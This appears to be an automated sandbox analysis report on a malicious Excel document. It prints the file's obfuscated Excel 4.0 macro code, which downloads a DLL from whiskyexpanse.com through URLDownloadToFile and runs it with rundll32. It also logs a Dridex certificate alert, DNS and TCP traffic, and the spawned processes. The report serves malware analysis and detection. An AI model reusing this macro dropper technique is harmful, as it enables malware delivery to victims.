                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 89 00 00 00 02 00 00 00 e4 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5SummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.272742285417
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . X . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . * . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 58 00 00 00 0c 00 00 00 70 00 00 00 0d 00 00 00 7c 00 00 00 13 00 00 00 88 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00 57 69 6e 64 6f 77 73 20
                                                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 279643
                                                    General
                                                    Stream Path:Book
                                                    File Type:Applesoft BASIC program data, first line number 8
                                                    Stream Size:279643
                                                    Entropy:3.18536385559
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . W i n d o w s U s e r B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 . . 8 . . . . . . . X
                                                    Data Raw:09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0c 57 69 6e 64 6f 77 73 20 55 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                    Macro 4.0 Code

                                                    =ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=EXEC('Docs 3'!BP86&'Docs 3'!BP87&'Docs 3'!BO97&'Docs 3'!BO98&'Docs 3'!BR66&'Docs 3'!BR86&'Docs 3'!BR87&'Docs 3'!BT94&'Docs 3'!BR103&'Docs 3'!BT101)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)='Docs 3'!BA19()
                                                    ,,,,,,ht,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=FORMULA(BJ10&BJ11&'Docs 3'!BI37&'Docs 
3'!BI38,BJ8)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)",,,,,,"=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=CALL(""U""&'Docs 3'!BQ77&'Docs 3'!BM72&""L""&'Docs 3'!BM73&'Docs 3'!BO73,""UR""&'Docs 3'!BT72&'Docs 3'!BT73&'Docs 3'!BU71&'Docs 3'!BS80&'Docs 3'!BS81,'Docs 3'!BU77&'Docs 3'!BU84,0,BJ8,'Docs 3'!BR66,0,0)='Docs 1'!AR25()",,,,,,
                                                    =HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,whiskyexpanse.com/ke/ohior.,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\ndgfht.frg,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,Mo,,n,,,,,LDow,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,",Pl",,,,,,,,,,,,,,,,,,u,,ugi,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nI,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ndl,,,,,,,,,,,,,,,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,it,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp                 Protocol  SID      Message                                                                      Source Port  Dest Port  Source IP    Dest IP
                                                    04/07/21-18:47:53.102805  TCP       2023476  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  443          49170      52.12.4.186  192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                    Apr 7, 2021 18:47:18.377865076 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.469909906 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:18.470122099 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.479497910 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.571708918 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:18.575726986 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:18.575788021 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:18.575849056 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.575891018 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.592698097 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.686321020 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:18.686815977 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:18.686868906 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:18.970978975 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.062788963 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239533901 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239584923 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239622116 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239650011 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239675999 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239715099 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239742994 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.239764929 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.239816904 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.239826918 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.239834070 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.240355968 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.240389109 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.240458965 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.240489960 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.241555929 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.241626978 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.241698027 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.241822004 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.243746996 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.243788958 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.243948936 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.245755911 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.245806932 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.245882988 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.245932102 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.248019934 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.248048067 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.248119116 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.248164892 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.260421038 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.312257051 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.312293053 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.312510014 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.312722921 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.312791109 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.312800884 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.312856913 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.315057039 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.315093040 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.315179110 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.317131996 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.317171097 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.317218065 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.317246914 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.320336103 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.320369005 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.320453882 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.321410894 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.321526051 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.321531057 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.321587086 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.323760033 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.323796034 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.323838949 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.323865891 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.325587988 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.325642109 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.325664043 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.325696945 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.331682920 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.331720114 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.331888914 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.332788944 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.332850933 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.332894087 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.332945108 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.335443974 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.335474968 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.335551023 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.336894989 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.336955070 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.397053957 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.397092104 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.397334099 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.397589922 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.397618055 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.397665977 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.397691965 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.398617983 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.398648977 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.398695946 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.398722887 CEST  49167        443        192.168.2.22   104.21.3.47
                                                    Apr 7, 2021 18:47:19.400782108 CEST  443          49167      104.21.3.47    192.168.2.22
                                                    Apr 7, 2021 18:47:19.400810957 CEST  443          49167      104.21.3.47    192.168.2.22

                                                    UDP Packets

                                                    Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                    Apr 7, 2021 18:47:18.337178946 CEST  52197        53         192.168.2.22   8.8.8.8
                                                    Apr 7, 2021 18:47:18.366961956 CEST  53           52197      8.8.8.8        192.168.2.22
                                                    Apr 7, 2021 18:47:52.051546097 CEST  53099        53         192.168.2.22   8.8.8.8
                                                    Apr 7, 2021 18:47:52.065507889 CEST  53           53099      8.8.8.8        192.168.2.22
                                                    Apr 7, 2021 18:47:52.069269896 CEST  52838        53         192.168.2.22   8.8.8.8
                                                    Apr 7, 2021 18:47:52.082361937 CEST  53           52838      8.8.8.8        192.168.2.22
                                                    Apr 7, 2021 18:47:53.861712933 CEST  61200        53         192.168.2.22   8.8.8.8
                                                    Apr 7, 2021 18:47:53.875118971 CEST  53           61200      8.8.8.8        192.168.2.22
                                                    Apr 7, 2021 18:47:53.881526947 CEST  49548        53         192.168.2.22   8.8.8.8
                                                    Apr 7, 2021 18:47:53.900218964 CEST  53           49548      8.8.8.8        192.168.2.22

                                                    DNS Queries

                                                    Timestamp                            Source IP     Dest IP   Trans ID  OP Code             Name               Type            Class
                                                    Apr 7, 2021 18:47:18.337178946 CEST  192.168.2.22  8.8.8.8   0x15d4    Standard query (0)  whiskyexpanse.com  A (IP address)  IN (0x0001)

                                                    DNS Answers

                                                    Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name               CName  Address        Type            Class
                                                    Apr 7, 2021 18:47:18.366961956 CEST  8.8.8.8    192.168.2.22  0x15d4    No error (0)  whiskyexpanse.com  -      104.21.3.47    A (IP address)  IN (0x0001)
                                                    Apr 7, 2021 18:47:18.366961956 CEST  8.8.8.8    192.168.2.22  0x15d4    No error (0)  whiskyexpanse.com  -      172.67.130.61  A (IP address)  IN (0x0001)

                                                    HTTPS Packets

                                                    Timestamp: Apr 7, 2021 18:47:18.575788021 CEST
                                                    Source IP: 104.21.3.47    Source Port: 443    Dest IP: 192.168.2.22    Dest Port: 49167
                                                    Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US; CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
                                                    Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
                                                    Not Before: Tue Mar 16 01:00:00 CET 2021; Mon Jan 27 13:48:08 CET 2020
                                                    Not After: Wed Mar 16 00:59:59 CET 2022; Wed Jan 01 00:59:59 CET 2025
                                                    JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
                                                    JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

                                                    Chain certificate (continuation row of the entry above, no timestamp in the report):
                                                    Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
                                                    Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
                                                    Not Before: Mon Jan 27 13:48:08 CET 2020
                                                    Not After: Wed Jan 01 00:59:59 CET 2025

                                                    Timestamp: Apr 7, 2021 18:47:53.102804899 CEST
                                                    Source IP: 52.12.4.186    Source Port: 443    Dest IP: 192.168.2.22    Dest Port: 49170
                                                    Subject: CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
                                                    Issuer: CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
                                                    Not Before: Wed Apr 07 09:39:35 CEST 2021
                                                    Not After: Thu Apr 07 09:39:35 CEST 2022
                                                    JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0
                                                    JA3 SSL Client Digest: eb88d0b3e1961a0562f006e5ce2a0b87

                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    System Behavior

                                                    General

                                                    Start time: 18:46:40
                                                    Start date: 07/04/2021
                                                    Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit): false
                                                    Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                    Imagebase: 0x13f6f0000
                                                    File size: 27641504 bytes
                                                    MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                                                    Has elevated privileges: true
                                                    Has administrator privileges: true
                                                    Programmed in: C, C++ or other language
                                                    Reputation: high

                                                    General

                                                    Start time: 18:46:45
                                                    Start date: 07/04/2021
                                                    Path: C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit): false
                                                    Commandline: rundll32 ..\ndgfht.frg,PluginInit
                                                    Imagebase: 0xff8a0000
                                                    File size: 45568 bytes
                                                    MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                                                    Has elevated privileges: true
                                                    Has administrator privileges: true
                                                    Programmed in: C, C++ or other language
                                                    Reputation: high

                                                    General

                                                    Start time: 18:46:45
                                                    Start date: 07/04/2021
                                                    Path: C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit): true
                                                    Commandline: rundll32 ..\ndgfht.frg,PluginInit
                                                    Imagebase: 0xe40000
                                                    File size: 44544 bytes
                                                    MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges: true
                                                    Has administrator privileges: true
                                                    Programmed in: C, C++ or other language
                                                    Reputation: high

                                                    General

                                                    Start time: 18:47:32
                                                    Start date: 07/04/2021
                                                    Path: C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):
                                                    Commandline: C:\Windows\System32\cmd.exe
                                                    Imagebase:
                                                    File size: 302592 bytes
                                                    MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges: true
                                                    Has administrator privileges: true
                                                    Programmed in: C, C++ or other language
                                                    Reputation: high

                                                    Disassembly

                                                    Code Analysis
